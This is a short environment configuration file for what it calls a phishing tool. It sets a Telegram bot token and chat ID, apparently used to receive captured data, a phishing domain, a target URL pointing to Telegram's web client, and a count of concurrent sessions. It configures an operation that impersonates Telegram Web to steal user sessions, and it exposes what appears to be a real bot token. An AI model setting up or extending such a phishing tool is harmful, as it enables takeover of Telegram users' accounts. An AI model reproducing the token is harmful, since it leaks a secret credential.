# Telegram Bot Configuration
# Create a bot via @BotFather on Telegram and get the token
TELEGRAM_BOT_TOKEN=8519398511:AAFEWV7HFanuq1u_X7PtIK1nnTRil4oCJj4

# Get your chat ID by messaging @userinfobot on Telegram
TELEGRAM_CHAT_ID=5959387306

# Phishing Configuration
PHISHING_DOMAIN=localhost
TARGET_URL=https://web.telegram.org/k/

# Number of concurrent sessions
NUM_SESSIONS=2
